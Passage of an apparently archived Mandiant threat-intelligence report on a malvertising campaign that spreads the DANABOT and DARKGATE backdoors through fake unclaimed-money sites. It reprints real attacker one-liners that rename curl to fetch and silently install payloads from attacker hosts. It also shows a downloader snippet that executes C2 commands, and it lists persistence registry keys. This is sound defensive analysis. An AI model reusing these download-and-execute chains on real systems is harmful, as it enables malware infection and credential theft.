{
	"id": "abd795b9-aecf-4ea6-a220-d1812af5678a",
	"created_at": "2026-04-06T00:10:11.193853Z",
	"updated_at": "2026-04-10T13:13:03.84905Z",
	"deleted_at": null,
	"sha1_hash": "d840fb5f1929247ffb5487c46d3026de97479ac8",
	"title": "Opening a Can of Whoop Ads: Detecting and Disrupting a Malvertising Campaign Distributing Backdoors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3278400,
	"plain_text": "Opening a Can of Whoop Ads: Detecting and Disrupting a Malvertising\r\nCampaign Distributing Backdoors\r\nBy Mandiant\r\nPublished: 2023-12-14 · Archived: 2026-04-05 16:11:12 UTC\r\nWritten by: Ryan Tomcik, Adrian McCabe, Rufus Brown, Geoff Ackerman\r\nEarlier this year, Mandiant’s Managed Defense threat hunting team identified an UNC2975 malicious advertising\r\n(“malvertising”) campaign presented to users in sponsored search engine results and social media posts, consistent with\r\nactivity reported in From DarkGate to DanaBot. This campaign dates back to at least June 19, 2023, and has abused search\r\nengine traffic and leveraged malicious advertisements to affect multiple organizations, which resulted in the delivery of the\r\nDANABOT and DARKGATE backdoors.\r\nManaged Defense worked with Advanced Practices and with the Google Anti-Malvertising team to remove the malicious\r\nadvertisements from the ads ecosystem, and subsequently alerted other impacted organizations to also take actions against\r\nthis campaign.\r\nThis blog post covers the details of recently discovered infrastructure operated by the distribution threat cluster UNC2975,\r\nwhich Mandiant has tracked since 2021, that leveraged malicious advertisements to trick users into visiting fake\r\n“unclaimed funds'' themed websites. In this UNC2975 campaign, the malicious websites delivered PAPERDROP and\r\nPAPERTEAR downloader malware that eventually led to DANABOT and DARKGATE backdoor malware. This blog post\r\nalso highlights how Mandiant's findings result in takedowns of malicious ad campaigns served on Google infrastructure.\r\nUNC2975 Targeting and TTPs\r\nMandiant currently tracks around 30 threat clusters that use malicious advertisements for the delivery of malware,\r\nincluding backdoors, data stealers, and downloaders. Since at least 2021, a threat actor tracked as UNC2975 has leveraged\r\nthis technique to distribute downloader malware for second-stage payloads on victim endpoints.\r\nUNC2975 is a distribution threat cluster that has historically used malvertising in order to distribute the VBScript-based\r\ndownloader tracked as PAPERDROP. The distribution of PAPERDROP from UNC2975’s fake websites has primarily led\r\nto the deployment of the Delphi-based backdoor DANABOT. DANABOT is part of a Malware-as-a-Service platform\r\nwhere multiple affiliates can purchase access to the service. Beginning in September 2023, UNC2975’s malware\r\ndistribution shifted. Instead of DANABOT, UNC2975 deployed a Delphi-based backdoor tracked as part of the\r\nDARKGATE Malware-as-a-Service platform. Due to multiple affiliates using these service platforms, the distribution\r\nmethods of DANABOT and DARKGATE may vary across different distribution actors.\r\nUNC2975 creates fake websites that leverage themes such as unclaimed money, family ancestry, and astrology/horoscopes\r\nto facilitate its distribution operations. The threat cluster has commonly used social media advertisements to promote the\r\nfake websites but have since expanded to leverage additional platforms such as Microsoft and Google advertising.\r\nAds Backwards: A Google Malvertising Response Team Investigation\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 1 of 35\n\nUpon being notified of this campaign by Mandiant Managed Defense, the Google Anti-Malvertising team took\r\nenforcement actions and pivoted on the advertisement metadata to find additional related entries and to improve abuse\r\ndetection and classification systems.\r\nAdversaries use several sophisticated techniques including impersonating genuine businesses, cloaking (i.e., hiding\r\nmalicious web pages that only get revealed under specific conditions), and redirection to circumvent Google Ads\r\nverification and defense mechanisms.\r\nTo protect users, Google detects, prevents, and blocks abusive activity as detailed in our annual Ads Safety report. Google\r\nencourages users to report suspicious advertisements they come across through either My Ad Center reporting functionality\r\nor using this form.\r\nMalware Observed\r\nMandiant observed the following malware families while investigating this campaign.\r\nMalware\r\nFamily\r\nDescription\r\nPAPERDROP\r\nPAPERDROP is a downloader written in Visual Basic Script that communicates via HTTPS. It has\r\nbeen observed downloading DANABOT by writing it to disk and then executing it.\r\nPAPERTEAR\r\nPAPERTEAR is a downloader written in Visual Basic Script that communicates via HTTP.\r\nPAPERTEAR appends a list of enumerated local processes in the initial HTTP request.\r\nDANABOT\r\nDANABOT is a backdoor written in Delphi that communicates using a custom binary protocol over\r\nTCP. The backdoor implements a plug-in framework that allows it to add capabilities via\r\ndownloaded plugins. DANABOT's capabilities include full system control using a VNC or RDP\r\nplugin, video and screenshot capture, keylogging, arbitrary shell command execution, and file\r\ntransfer. DANABOT's proxy plugin allows it to redirect or manipulate network traffic associated\r\nwith targeted websites. This capability is often used to capture credentials or payment data.\r\nDANABOT can also extract stored credentials associated with web browsers and FTP clients.\r\nNumerous observed campaigns leveraging DANABOT have been reported, including UNC3379\r\nactivity associated with a coinminer campaign, and a similar mechanism for DANABOT distribution\r\nusing a different JS library.\r\nDARKGATE DARKGATE is a Delphi-based backdoor capable of performing keyboard capture, shell command\r\nexecution, file transfer and execution, and credential theft. Other functions include system survey,\r\nshutdown and restart, taking screengrabs and controlling a cryptominer. Some variants retrieve their\r\ncommand-and-control (C2 or C\u0026C) address from a page on the pastebin.com website.\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 2 of 35\n\nMore notable instances of OSINT reporting involving DARKGATE include actors previously\r\nassociated with QAKBOT leveraging DARKGATE as a payload, and some insights into\r\nDARKGATE’s technical architecture and use.\r\nTable 1: Malware families observed\r\nA Pain in the Ads: UNC2975 Campaign Discovery\r\nThreat actors purchase advertisements [MITRE ATT\u0026CK® Technique T1583.008] for malicious websites with the goal of\r\ntricking users into visiting and downloading malware [T1189], which can lead to data theft and ransomware. Platforms that\r\nserve advertisements, such as search engines or social media, can provide granular controls that allow advertisers to target\r\nspecific audiences based on users’ geographic locations, IP address range (e.g., geofencing), browsing history, and device\r\ntypes. Some of the more robust advertising platforms (such as Bing and Google Ads) provide even more targeting\r\ncategories, like age, gender, income level, and other audience attributes. These capabilities allow advertisers, both\r\nlegitimate and malicious, to craft ads specific to their desired targets and improve the effectiveness of their campaigns. This\r\nalso allows malicious advertisers who are able to avoid policy enforcement to develop and retain “customer” profiles about\r\nthe victims who interact with their ads for use in future targeting operations.\r\nEarlier this year, Managed Defense’s threat hunting team identified UNC2975 advertisements presented to users in\r\nsponsored search engine results and social media posts. The advertised websites were displayed in the sponsored results for\r\nsearches related to “unclaimed money” where individuals can search for and claim funds that are held by federal or state\r\ngovernment agencies [T1583.008].\r\nFigure 1: Search engine results advertising an UNC2975 controlled website\r\nWhen an unsuspecting victim clicked on a malicious advertised result, they were presented with a web portal that\r\nprompted them to enter their first and last name and their state of residence in order to receive a “report” on purported\r\nunclaimed funds.\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 3 of 35\n\nFigure 2: Screenshot of TreasuryDept[.]org on September 10, 2023 Retrieved from Wayback Machine\r\nIn each investigation under this campaign, Mandiant identified browser history artifacts on affected systems showing that a\r\nuser clicked on a malicious advertisement and interacted with one of two websites: \r\nclaimprocessing[.]org or treasurydept[.]org.\r\nAdvertisement\r\nPlacement\r\nBrowser History Artifact(s)\r\nSocial Media Post\r\nMalicious URL:\r\nhttps[:]//www[.]claimprocessing[.]org/?utm_source=\r\n\u003csocialmedia\u003eads\u0026utm_medium=cpc\u0026utm_campaign=claim\u0026\u003csnip\u003e\r\nPage Title: \r\n“Find Mass Money - ClaimProcessing[.]org”\r\nVisit From: \r\nhttps://l.\u003csocialmedia\u003e[.]com/l.php?u=\u003csnip\u003e\r\nVisit Type: \r\nLink - Redirect\r\nSponsored Search\r\nEngine Result\r\nSearch URL:\r\nhttps://www[.]google[.]com/search?q=finding+unclaimed+money+in+california\u0026rlz=\r\n\u003csnip\u003e\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 4 of 35\n\nMalicious URL:\r\nhttps://www[.]treasurydept[.]org/?\r\nutm_source=googlesearch\u0026utm_medium=cpc\u0026utm_campaign=google\r\nPage Title: \r\n“Find Unclaimed Money - TreasuryDept[.]org”\r\nVisit From: \r\nhttps://www[.]googleadservices[.]com/pagead/aclk?sa=\u003csnip\u003e\r\nVisit Type: \r\nLink - Redirect\r\nTable 2: Browser history artifacts showing where the malicious advertisement was promoted\r\nThe downloadable “reports” were actually ZIP archive files containing Visual Basic scripts that Mandiant identified as\r\nvariants of the downloader malware families PAPERDROP and PAPERTEAR. The ZIP archive and Visual Basic script\r\nfilenames were based on the values the user submitted into the web form. Launching the Visual Basic script from an\r\narchive file generates a process execution event that launches the script from a temporary folder path [T1059.005]. The\r\ntemporary folder path that’s created is dependent on the archiving utility, such as WinRAR, that’s used to unpack the\r\narchive file.\r\nEvent Event Details\r\nMalicious ZIP File\r\nDownload\r\nFile Write Process(es):\r\nC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\r\nC:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\r\nSample Download URL(s):\r\nhttps[:]//www[.]treasurydept[.]org/gujijed/tokew.php\r\nhttps[:]//www[.]claimprocessing[.]org/roxif/pateromyx.php\r\nSample Destination Path(s): \r\nC:\\Users\\\u003cuser\u003e\\Downloads\\flast_d45534i.zip\r\nC:\\Users\\\u003cuser\u003e\\Downloads\\msmith-dc45389tyt.zip\r\nPAPERDROP /\r\nPAPERTEAR\r\nExecution\r\nParent Process: \r\nC:\\Windows\\explorer.exe\r\nProcess:\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 5 of 35\n\nC:\\Windows\\System32\\wscript.exe\r\nSample Command Line:\r\n\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\1\\Temp1_flast_d45534i.zip\\flast_d45534i.vbs\"\r\nTable 3: Initial Visual Basic script payload download and execution\r\nMandiant identified three different delivery chains that PAPERDROP and PAPERTEAR used to download and execute\r\nsecondary payloads DANABOT and DARKGATE malware attributed to multiple UNC groups. Two delivery chains\r\nleveraged a renamed version of the cURL binary  curl.exe  [T1105] to download a malicious installation\r\npackage  .msi  file [T1218.007] or an AutoIt executable,  AutoIt3.exe  and malicious AutoIt script,  .au3  file [T1059].\r\nMandiant also observed PAPERDROP download and execute a malicious installation package file without using a specific\r\ntransfer tool.\r\nPayload Delivery\r\nChains\r\nEvent Details\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 6 of 35\n\nDelivery Chain #1:\r\nRenamed cURL\r\ndownloading Windows\r\nInstaller Package and\r\nexecuting with\r\nMsiexec.exe \r\nParent Process: \r\nC:\\Windows\\System32\\wscript.exe\r\nProcess:\r\nC:\\Windows\\System32\\cmd.exe\r\nCommand Line(s):\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cd /d\r\nC:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\ \u0026 copy\r\nc:\\windows\\system32\\curl.exe KFSELqcUm.exe \u0026 KFSELqcUm.exe -o\r\nqgEYlIKPDYzj.msi https[:]//pittsburgh.soulcarelife[.]org/?\r\nsxykn3bjp0rmnaefzc8jb3qc2704 \u0026 C:\\Windows\\System32\\msiexec.exe /i\r\nqgEYlIKPDYzj.msi /qn\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cd /d\r\nC:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\ \u0026 copy\r\nc:\\windows\\system32\\curl.exe ihcbzhY.exe \u0026 ihcbzhY.exe -o SYUxEbPz.msi\r\nhttps[:]//durham.soulcarelife[.]org/?n3sqd95xk20z2b3vue9tnpiadp2j6 \u0026\r\nC:\\Windows\\System32\\msiexec.exe /i SYUxEbPz.msi /qn\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cd /d\r\nC:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\ \u0026 copy\r\nc:\\windows\\system32\\curl.exe NVJwQupTC.exe \u0026 NVJwQupTC.exe -o\r\nBEqvhTR.msi https[:]//plano.soulcarelife[.]org/?\r\nvc4njfp8xnwzb30akwaf2pj3fjs36q \u0026 C:\\Windows\\System32\\msiexec.exe /i\r\nBEqvhTR.msi /qn\r\nDelivery Chain #2:\r\nRenamed cURL\r\ndownloading AutoIT\r\nexecutable and script file\r\nParent Process: \r\nC:\\Windows\\System32\\wscript.exe\r\nProcess:\r\nC:\\Windows\\System32\\cmd.exe\r\nCommand Line(s):\r\n\"C:\\Windows\\System32\\cmd.exe\" /c mkdir c:\\yifr \u0026 cd /d c:\\yifr \u0026 copy\r\nc:\\windows\\system32\\curl.exe yifr.exe \u0026 yifr -H \"User-Agent: curl\" -o\r\nAutoit3.exe http[:]//infocatalog[.]pics:8080 \u0026 yifr -o khscrk.au3\r\nhttp[:]//infocatalog[.]pics:8080/msiyifrmouv \u0026 Autoit3.exe khscrk.au3\r\nDelivery Chain #3:\r\nWindows Script Host\r\nprocess downloading\r\nParent Process: \r\nC:\\Windows\\System32\\wscript.exe\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 7 of 35\n\nWindows Installer\r\nPackage and executing\r\nwith Msiexec.exe\r\nProcess:\r\nC:\\Windows\\System32\\msiexec.exe\r\nCommand Line(s):\r\nmsiexec /i C:\\programData\\Y9U68YA55.bin /qn\r\nTable 4: PAPERDROP and PAPERTEAR delivery chains\r\nThe subsequent system artifacts that were created varied depending on the backdoor payload that was delivered. The post-delivery infection timelines shown in the following sections may not represent all potential artifacts as complete malware\r\nexecution may have been disrupted by endpoint security software or network controls.\r\nInfection Chain #1: PAPERDROP \u003e DANABOT\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 8 of 35\n\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 9 of 35\n\nFigure 3: Infection chain #1 involving DANABOT\r\nIn the first infection chain following PAPERDROP execution, the Windows Script Host process  wscript.exe  performed\r\na DNS request for the domain  mesa.halibut[.]sbs  and connected to the IP address  47.252.45[.]173  over port  443 .\r\nThe process  wscript.exe  then executed the Windows Installer utility  msiexec.exe  [T1218.007] with the\r\ncommand  msiexec /i C:\\programData\\HLWOIRTAA9P.bin /qn  to quietly install an application using the package\r\nfile  C:\\programData\\HLWOIRTAA9P.bin  that masqueraded as a  .bin  file [T1036.008]. Next, the Msiexec application\r\nlaunched the installer process  C:\\Windows\\Installer\\MSI4F8C.tmp  which executed\r\nthe  rundll32.exe  command  C:\\WINDOWS\\system32\\rundll32.exe C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\Oadsoophotfp.dll,start  to load the in-memory dropper DLL file  C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\Oadsoophotfp.dll  and execute a function named  start  to decompress and deobfuscate a\r\nDANABOT payload [T1218.011]. The  rundll32.exe  process performed a series of writes to extensionless files under the\r\nuser’s  AppData\\Local\\Temp  directory.\r\nThe infected  rundll32.exe  process communicated with the IP address  35.203.111[.]228  over port  443  and the local\r\nIP address  127.0.0[.]1  over ports  22405  and  52787 . The DANABOT malware launched the\r\ncommand  \"C:\\WINDOWS\\system32\\rundll32.exe\" \"C:\\WINDOWS\\system32\\shell32.dll\",#61 22405  to open and interact\r\nwith the Run dialog that is  normally accessed through the Start Menu. Lastly, the infected  rundll32.exe  process\r\nexecuted the commands  schtasks /End /tn \\Microsoft\\Windows\\Wininet\\CacheTask  and  schtasks /Run /tn\r\n\\Microsoft\\Windows\\Wininet\\CacheTask  to stop and start the Wininet Cache Task [T1053.005]. This Scheduled Task\r\nactivity may be related to Wininet API hooking to intercept credentials entered into Microsoft Edge or Internet Explorer.\r\nFinally, the DANABOT infected  rundll32.exe  process created and wrote to a randomly named  .tmp  file, such\r\nas  C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\tmpAEA8.tmp  or  C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Aroeihiaietwq.tmp .\r\nAlthough not observed in each case, Mandiant identified Run key persistence to execute the DANABOT payload in the\r\nfile  C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\Oadsoophotfp.dll  using a random key value:  HKEY_USERS\\\r\n\u003cuser\u003e\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\\\\Hryrqsf  [T1547.001].\r\nInfection Chain #2: PAPERTEAR \u003e RENAMED CURL \u003e DARKGATE\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 10 of 35\n\nFigure 4: Infection chain #2 involving DARKGATE\r\nIn the second infection chain, the PAPERTEAR downloader performed an HTTP POST request to the\r\nhost  infocatalog[.]pics  over port  8080 . Next, the  wscript.exe  process executed the Windows Command Shell\r\nusing an extended one-liner consisting of multiple commands, shown in Figure 5.\r\nCommand Line:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c mkdir c:\\yifr \u0026 cd /d c:\\yifr \u0026 copy c:\\windows\\system32\\curl.exe yifr.exe \u0026 yifr -H \"U\r\nCommand Breakdown:\r\nmkdir c:\\yifr\r\nCreate the directory c:\\yifr\r\ncd /d c:\\yifr\r\nChange the working directory to the folder c:\\yifr\r\ncopy c:\\windows\\system32\\curl.exe yifr.exe\r\nCopy the cURL binary curl.exe to a new file named yifr.exe\r\nyifr -H \"User-Agent: curl\" -o Autoit3.exe http[:]//infocatalog[.]pics:8080\r\nUse the renamed cURL binary to download the file Autoit3.exe hosted on the domain infocatalog[.]pics\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 11 of 35\n\nyifr -o khscrk.au3 http[:]//infocatalog[.]pics:8080/msiyifrmouv\r\nUse the renamed cURL binary to download the file khscrk.au3 hosted on the domain infocatalog[.]pics\r\nAutoit3.exe khscrk.au3\r\nExecute the AutoIt script file khscrk.au3 using Autoit3.exe to install DARKGATE malware\r\nFigure 5: Breakdown of Windows Command Shell one-liner to drop DARKGATE\r\nInfection Chain #3: PAPERDROP \u003e RENAMED CURL \u003e DANABOT\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 12 of 35\n\nFigure 6: Infection chain #3 involving DANABOT\r\nIn the third infection chain, the PAPERDROP downloader executed another extended one-liner that used a\r\nrenamed  curl.exe  binary [T1105] to download and install a malicious package file that drops DANABOT [T1218.007]. \r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 13 of 35\n\nCommand Line:\r\n\"C:\\Windows\\System32\\cmd.exe\" /c cd /d C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\ \u0026 copy c:\\windows\\system32\\curl.exe ihcbz\r\nCommand Breakdown:\r\ncd /d C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\\r\nChange the working directory to the folder C:\\Users\\%USERNAME%\\AppData\\Local\\Temp\\\r\ncopy c:\\windows\\system32\\curl.exe ihcbzhY.exe\r\nCopy the cURL binary curl.exe to a new file named ihcbzhY.exe\r\nihcbzhY.exe -o SYUxEbPz.msi https://durham.soulcarelife[.]org/?n3sqd95xk20z2b3vue9tnpiadp2j6\r\nUse the renamed cURL binary to download the file SYUxEbPz.msi hosted on the domain durham.soulcarelife[.]org\r\nC:\\Windows\\System32\\msiexec.exe /i SYUxEbPz.msi /qn\r\nInstall the malicious package file using Msiexec\r\nFigure 7: Breakdown of Windows Command Shell one-liner to drop DANABOT\r\nFollowing the execution of the  SYUxEbPz.msi  package installation, the  msiexec.exe  process created files to spoof the\r\nappearance of the Cisco Umbrella Roaming application under the directory  C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco\r\nCorp\\Umbrella Roaming Client\\Umbrella Roaming Client . One file in the new directory —  CoreReborn32.bin  — was\r\nidentified as a DANABOT launcher. In a separate investigation, Mandiant identified a folder path that spoofed the Box\r\nEdit application and dropped a DANABOT payload to the path  C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Box Inc\\Box Edit\\Box\r\nEdit\\Box.LocalComServer.Fix.Environment.dll .\r\nNext, the Windows Installer process  C:\\Windows\\Installer\\MSI23C9.tmp  launched the DANABOT backdoor with the\r\nRundll32 command  rundll32.exe \"C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco Corp\\Umbrella Roaming Client\\Umbrella\r\nRoaming Client\\CoreReborn32.bin\",start  [T1218.011]. Once executed, the DANABOT infected  rundll32.exe  process\r\nwrote to the Windows Run key  HKEY_USERS\\\u003cuser\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Srfshu  to ensure\r\npersistent execution of the command  \"C:\\WINDOWS\\system32\\RUNDLL32.EXE\" \"C:\\Users\\\u003cuser\u003e\\AppData\\Roaming\\Cisco\r\nCorp\\Umbrella Roaming Client\\Umbrella Roaming Client\\CoreReborn32.bin\",start  [T1547.001]. In addition to Run key\r\npersistence, Mandiant has also identified the capability for DANABOT to use a new Windows service [T1543.003] using\r\nthe  ServiceDll  entry to point to the malicious DLL.\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 14 of 35\n\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 15 of 35\n\nFigure 8: Infection chain #3 involving DANABOT\r\nSimilar to the first infection chain, the infected  rundll32.exe  performed a series of writes to extensionless files under the\r\nuser’s  AppData\\Local\\Temp  directory and communicated with the IP address  34.16.181[.]0  over port  443  and the\r\nlocal IP address  127.0.0[.]1  over port  15066 . The DANABOT malware launched the\r\ncommand  \"C:\\WINDOWS\\system32\\rundll32.exe\" \"C:\\WINDOWS\\system32\\shell32.dll\",#61 15066  to open and interact\r\nwith the Run dialog and executed the commands  schtasks /End /tn\r\n\\Microsoft\\Windows\\Wininet\\CacheTask  and  schtasks /Run /tn \\Microsoft\\Windows\\Wininet\\CacheTask  to stop and\r\nstart the Wininet Cache Task [T1053.005]. The DANABOT payload also modified the local proxy settings in the Windows\r\nregistry [T1562].\r\nFinally, the DANABOT-infected  rundll32.exe  process wrote to a randomly named  .tmp  file  C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\Prfpdh.tmp .\r\nWiseAds Comments: PAPERDROP and PAPERTEAR\r\nThroughout the course of the observed malvertising campaign, Mandiant encountered both PAPERDROP and\r\nPAPERTEAR Visual Basic Script (VBS) files in use by malicious actors to facilitate payload deployment.\r\nThe main difference in functionality between PAPERDROP and PAPERTEAR is that PAPERDROP makes heavier use of\r\nlocal files to facilitate payload deployment, whereas PAPERTEAR leverages direct command line execution.\r\nPAPERDROP\r\nInitially observed by Mandiant in January 2021 in use by UNC2975, PAPERDROP is primarily associated with\r\nDANABOT payload distribution and generally has several distinct characteristics across two different build types. NOTE:\r\nSince 2021, PAPERDROP has been observed in use by multiple UNC groups. The samples shown in this section represent\r\na cross-section of the PAPERDROP malware family as a whole, and are not specific to UNC2975 activity.\r\nThe first build type is markedly denser than the second. It features prominent use of code comments, complex variable\r\nnames, and other junk code presumably used as a rudimentary code obfuscation mechanism [T1027].\r\nFigure 9: PAPERDROP type #1, junk code and comments\r\nIn addition to the more commonly observed mechanism for code comments leveraging single quotes  ‘ , Visual Basic also\r\nallows the use of the characters “REM” to designate code comments. This can be seen in Figure 10. \r\nLooking through the smoke-screened code reveals some interesting elements. PAPERDROP seemingly leverages basic\r\nmathematical operations (especially modulus or “Mod”) as part of its execution flow.\r\nFigure 10: PAPERDROP type #1 source code, math functions\r\nIt also does little in the way of obfuscation with regard to concealing its C2 addresses or file system path names. It merely\r\nseparates these values through individual function calls to add characters to progressively concatenated strings, but it is\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 16 of 35\n\npossible to view the characters by simply scrolling through the file and reading them in reverse order from bottom to top\r\n(see Figure 11).\r\nFigure 11: PAPERDROP Type #1 source code, reverse-order string concatenation\r\nSome samples of PAPERDROP build type #1 feature elaborate Sleep calls, presumably in an attempt to evade sandbox\r\ndetection.\r\nFigure 12: PAPERDROP Type #1 source code, Sleep calls\r\nConversely, PAPERDROP build type #2 is much closer to PAPERTEAR in its architecture. It makes limited use of smoke-screened/obfuscated code in comparison to build type #1, though it still makes use of mathematical functions as part of its\r\nexecution flow.\r\nFigure 13: PAPERDROP type #2 raw source code\r\nWhen fully deobfuscated, the core download functionality executes as shown in Figure 14.\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 17 of 35\n\nFigure 14: PAPERDROP Type #2 deobfuscated source code, core payload retrieval\r\nIn the case of Figure 14, the file payload from  ignitethefund[.]com  was saved to  C:\\ProgramData\\1DR.png , though it\r\nwas executed by the PAPERDROP VBS as a DLL.\r\nPAPERTEAR\r\nSimilar to PAPERDROP build type #2, PAPERTEAR is also comparatively less dense. It too avoids excessive use of junk\r\ncode and stays fairly direct in terms of its execution flow. When executed on a host, most variants of PAPERTEAR try to\r\ncollect a list of running processes via Windows Management Instrumentation [T1047].\r\nFigure 15: PAPERTEAR source code, process retrieval\r\nPAPERTEAR will then initiate an attempt to retrieve its payload via an HTTP POST request to a remote C2 server via\r\na WinHTTPrequest object, and, for certain variants, appends the list of running processes it retrieves (code shown in Figure\r\n16) to the outbound HTTP request header. One of the minor obfuscation methods leveraged by PAPERTEAR samples is\r\nthe sporadic inclusion of curious code comments (Figure 16), presumably to avoid static-based detections and amplify\r\ncode entropy. In this case, however, identifying the literary source of the comments was…quite elementary.\r\nFigure 16: PAPERTEAR source code, HTTP functionality, code comments sourced from a Sherlock Holmes novel\r\nFrom there, PAPERTEAR will then parse the HTTP response from the C2 server and directly execute its contents on the\r\nhost via ShellExecute. With the limited obfuscation removed, the crucial snippet of code from Figure 16 that performs this\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 18 of 35\n\nfunction would otherwise appear as:\r\nCreateObect(\"Shell Application\").ShellExecute \"cmd\",\"\u003cvariable with http response from c2 containing arbitrary command\u003e\r\nThis is the core differentiator between PAPERTEAR and PAPERDROP. While PAPERTEAR executes commands directly\r\nfrom the HTTP response it receives, PAPERDROP writes the contents of the HTTP response to disk prior to executing\r\nadditional steps in its infection chain. PAPERTEAR is primarily associated with the distribution of DARKGATE payloads\r\nand is suspected to be integrated directly into the DARKGATE malware build process.\r\nCampaign Tracking \r\nMandiant has been disseminating intelligence on UNC2975’s campaign within Mandiant Advantage, providing our\r\ncustomers with notable and dynamic updates regarding changes in tactics and techniques, the introduction of tools with\r\nnew capabilities, and the use of new infrastructure UNC2975 has used to carry out its mission. \r\nMandiant tracks separate campaigns for each distribution method or actors delivering the Malware-as-a-Service backdoor\r\nDARKGATE. To differentiate between the initial malware distribution, DARKGATE infrastructure, and follow-on activity,\r\nMandiant tracks each part of the intrusion as separate clusters until further overlaps are identified and warrant merging.\r\nMandiant tracks the DARKGATE Malware-as-a-Service infrastructure and associated payloads as UNC5085 while\r\nseparately clustering the different distribution methods and any follow-on actors.\r\nSee our previous blog post for more insights into how Mandiant can help Gain Visibility Into Attacker Activity with Threat\r\nCampaigns. The following campaigns within Mandiant Advantage are associated with recent DARKGATE distribution\r\nactors and follow-on activity: \r\nCampaign\r\nNumber\r\nCampaign Actors\r\nCAMP.23.045\r\nSuspected Financially Motivated Actor Phishing Employees via LinkedIn\r\nto Distribute DARKGATE Backdoor\r\nUNC4962\r\n(Distribution)\r\nUNC5085\r\n(DARKGATE)\r\nCAMP.23.046\r\nFinancially Motivated Threat Actor Using Social Media and SEO\r\nPoisoning to Compromise User with PAPERDROP and DANABOT\r\nUNC2975\r\n(Distribution)\r\nUNC5085\r\n(DARKGATE)\r\nCAMP.23.050 Financially Motivated Actor Distributing DARKGATE via Microsoft\r\nTeams\r\nUNC5051\r\n(Distribution)\r\nhttps://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors\r\nPage 19 of 35\n\nUNC5085\r\n(DARKGATE)\r\nCAMP.23.051\r\nDistribution Cluster UNC2500 Emerges After Hiatus to Distribute\r\nVarious Payloads Downloaded from Links in Phishing Emails\r\nUNC2500\r\n(Distribution)\r\nUNC5085\r\n(DARKGATE)\r\nCAMP.23.053\r\nFinancially Motivated Threat Actor Leveraging DARKGATE Access to\r\nDeploy BASTA Ransomware\r\nUNC2500\r\n(Distribution)\r\nUNC4393 (Follow-on)\r\nOutlook and Implications\r\nIn M-Trends 2023, the three most common initial access techniques Mandiant observed related to workstation compromise\r\nwere phishing [T1566], drive-by compromise [T1189], and replication through removable media [T1091]. Within the\r\ncategory of drive-by compromise, Mandiant has observed an increase from 2022 to 2023 in the number of investigations\r\ninvolving malicious advertisements where the initial infection vector was able to be identified. More broadly, in 2022\r\nalone, Google removed over 5.2 billion ads, restricted over 4.3 billion ads and suspended over 6.7 million advertiser\r\naccounts. While it is unlikely that malvertising will cease to be a viable attack vector for threat actors, maintaining a level\r\nof response readiness when such threats are identified is key to being able to neutralize campaigns in their early stages. In\r\nthis case, Mandiant Managed Defense, in partnership with Mandiant Intelligence and the Google Ads team, was\r\nsuccessfully able to protect users on a granular host-based level as well as at a global scale across the Google ecosystem.\r\nMandiant’s Managed Defense threat hunting team focuses on identifying behaviors associated with threat actors and\r\nendpoint compromises, especially those that don’t typically generate product-based alerts. By focusing on behavioral\r\nindicators, we can identify evidence of different types of compromise, such as malware execution or a threat actor profiling\r\nan environment using discovery commands. Like all security analysts, when we identify evidence of compromise, we\r\nanalyze the data to try to answer the question: “How was the system initially compromised?” Performing a deeper dive to\r\nidentify the initial infection vector and related timeline events provides two benefits: [1] the ability to identify campaigns\r\nthrough repeated use of infrastructure and indicators and [2] additional malware or behavioral artifacts that can be used to\r\ncreate or expand existing detections, event correlations, and threat hunting missions. The Detection Opportunities section\r\nof this blog post includes commands and 